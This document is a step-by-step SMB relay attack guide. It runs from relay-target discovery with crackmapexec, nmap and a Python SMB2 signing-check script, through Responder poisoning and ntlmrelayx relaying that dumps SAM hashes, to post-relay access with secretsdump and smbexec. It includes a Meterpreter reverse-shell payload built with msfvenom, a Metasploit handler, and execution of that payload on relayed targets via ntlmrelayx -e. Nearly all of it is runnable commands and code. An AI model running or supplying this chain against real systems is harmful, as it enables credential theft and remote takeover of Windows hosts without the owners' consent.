SMB Relay
Check whether there are relayable targets: hosts where SMB signing is not required. CrackMapExec can generate that list directly. Note that a relayed authentication cannot be bounced back to the host it came from (that was closed by MS08-068), so the list must contain hosts other than the victim.
# Change the IP range for your target
crackmapexec smb 10.0.0.0/24 --gen-relay-list /tmp/targets.txt
Check the SMB signing requirement yourself as well. Look for hosts with port 445 open that report "Message signing enabled but not required" or "Message signing disabled"; a host that reports "Message signing enabled and required" will reject the relayed session.
nmap --script=smb2-security-mode.nse -p445 10.0.0.0/24
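The check that nmap's smb2-security-mode script performs, written out as an added Python example (it is not code from this page, from nmap or from CrackMapExec): it sends a raw SMB2 NEGOTIATE to port 445 and reads the SecurityMode flags of the response, which is exactly what "enabled but not required" means on the wire. The field names follow MS-SMB2; the `relay_candidate` key, the command-line usage and the constructed sample response used for offline testing are this example's own. Standard library only.

```python
import socket
import struct
import sys
import uuid

# SecurityMode flags of the SMB2 NEGOTIATE response (MS-SMB2 2.2.4)
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64
NETBIOS_HEADER_LEN = 4
# SMB 2.0.2 to 3.0.2; 3.1.1 needs negotiate contexts and is left out on purpose
DIALECTS = (0x0202, 0x0210, 0x0300, 0x0302)


def _smb2_header(flags=0):
    """64-byte SMB2 header: command 0 (NEGOTIATE), MessageId 0, 1 credit, no signature."""
    return struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, SMB2_HEADER_LEN,
                       0, 0, 0, 1, flags, 0, 0, 0, 0, 0, b"\x00" * 16)


def build_negotiate_request():
    """NetBIOS-framed SMB2 NEGOTIATE request as sent over TCP/445."""
    body = struct.pack("<HHHHI16sQ",
                       36,                              # StructureSize (fixed by the spec)
                       len(DIALECTS),                   # DialectCount
                       SMB2_NEGOTIATE_SIGNING_ENABLED,  # client can sign, does not demand it
                       0, 0,                            # Reserved, Capabilities
                       uuid.uuid4().bytes,              # ClientGuid
                       0)                               # ClientStartTime
    body += b"".join(struct.pack("<H", d) for d in DIALECTS)
    pdu = _smb2_header() + body
    return struct.pack(">I", len(pdu)) + pdu  # 0x00 session-message type + 24-bit length


def parse_security_mode(raw):
    """Classify a NetBIOS-framed NEGOTIATE response the way smb2-security-mode reports it."""
    pdu = raw[NETBIOS_HEADER_LEN:]
    if len(pdu) < SMB2_HEADER_LEN + 6:
        raise ValueError("short read")
    if pdu[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 response (SMB1-only host or non-SMB service)")
    status, command = struct.unpack_from("<IH", pdu, 8)   # Status at 8, Command at 12
    if command != 0 or status != 0:
        raise ValueError(f"unexpected response: command={command} status=0x{status:08x}")
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", pdu, SMB2_HEADER_LEN)
    if structure_size != 65:
        raise ValueError(f"bad NEGOTIATE response StructureSize {structure_size}")
    enabled = bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED)
    required = bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED)
    if required:
        verdict = "Message signing enabled and required"
    elif enabled:
        verdict = "Message signing enabled but not required"
    else:
        verdict = "Message signing disabled"
    return {"dialect": f"0x{dialect:04x}", "signing_enabled": enabled,
            "signing_required": required,
            "relay_candidate": not required,   # relay only works if signing is not demanded
            "verdict": verdict}


def check_host(host, port=445, timeout=3.0):
    """Probe one host live. Does network I/O; the offline test does not call it."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        nb = s.recv(NETBIOS_HEADER_LEN)
        if len(nb) < NETBIOS_HEADER_LEN:
            raise ValueError("connection closed before a NetBIOS header arrived")
        length = struct.unpack(">I", nb)[0] & 0x00FFFFFF
        data = b""
        while len(data) < length:
            chunk = s.recv(length - len(data))
            if not chunk:
                break
            data += chunk
        return parse_security_mode(nb + data)


def sample_negotiate_response(security_mode, dialect=0x0302):
    """Constructed NEGOTIATE response (not a capture) so the parser can be run offline."""
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect,
                       0, b"\x00" * 16, 0,            # Reserved, ServerGuid, Capabilities
                       0x10000, 0x10000, 0x10000,     # MaxTransact/Read/WriteSize
                       0, 0,                          # SystemTime, ServerStartTime
                       SMB2_HEADER_LEN + 64, 0, 0)    # SecurityBuffer off/len, ctx offset
    pdu = _smb2_header(flags=0x00000001) + body       # flag 0x1 = server-to-client
    return struct.pack(">I", len(pdu)) + pdu


if __name__ == "__main__":
    # usage: python3 smb_signing_check.py HOST [HOST ...] > /tmp/targets.txt
    for target in sys.argv[1:]:
        try:
            info = check_host(target)
        except (OSError, ValueError) as err:
            print(f"# {target}: {err}", file=sys.stderr)
            continue
        print(f"# {target}: {info['verdict']} (dialect {info['dialect']})", file=sys.stderr)
        if info["relay_candidate"]:
            print(target)   # stdout is the relay target list
```

Hosts that answer with "enabled and required" are printed to stderr only, so stdout can be fed straight to ntlmrelayx as a target file. SMB1-only hosts raise rather than being classified: they respond with `\xffSMB`, and deciding their signing policy needs an SMB1 NEGOTIATE, which this example does not implement.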

Start Responder for LLMNR/NBT-NS poisoning. Disable Responder's own SMB and HTTP servers in its configuration first; otherwise Responder captures the authentication itself instead of leaving those ports to ntlmrelayx.
# Set "SMB = Off" and "HTTP = Off" in /etc/responder/Responder.conf before starting.
sudo responder -I eth0 -PvdDw
# If you intend to use ntlmrelayx's -e option (execute a file on the target), build the payload and start a handler first to receive the reverse shell.
Kali> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.208 LPORT=80 -f exe -o rshell.exe
Kali> sudo msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/meterpreter/reverse_tcp;set AutoRunScript post/windows/manage/migrate;set LHOST 10.0.0.208 ;set LPORT 80;run -j"
# then, run Responder
sudo responder -I eth0 -PvdDw
Start ntlmrelayx with the target list generated above. By default it relays each captured authentication to the listed hosts and, when the relayed account is a local administrator there, dumps the target's SAM hashes.
ntlmrelayx.py -smb2support -tf /tmp/targets.txt
# -e option: run the payload on each target after a successful relay. --no-http-server keeps ntlmrelayx off port 80, which the Metasploit handler above is listening on.
ntlmrelayx.py -smb2support -tf /tmp/targets.txt -e ./rshell.exe --no-http-server
Trigger an authentication from a victim to the Kali host. In an engagement, Responder's poisoning induces this when a user or service resolves a name that does not exist; in a lab you can force it by hand from a Windows machine. The user who authenticates must be a local administrator on the relay targets for the SAM dump or -e to succeed.
# From the target Windows host, connect to a share on Kali (the share name does not need to exist).
CMD> Copy a.txt \\10.0.0.208\smb

Relaying does not hand you the NTLM hash itself, only an authenticated session on the target. If ntlmrelayx was started with -socks instead of the default SAM dump, it keeps that relayed SMB session open on a local SOCKS proxy (port 1080 by default) and you can drive it with Impacket tools through proxychains. Point /etc/proxychains4.conf at that port; the password on the command line is ignored because the session is already authenticated.
Kali> proxychains4 -q secretsdump.py FILE01/Administrator:anypassword@10.0.0.59
Kali> proxychains4 -q smbexec.py FILE01/Administrator:anypassword@10.0.0.59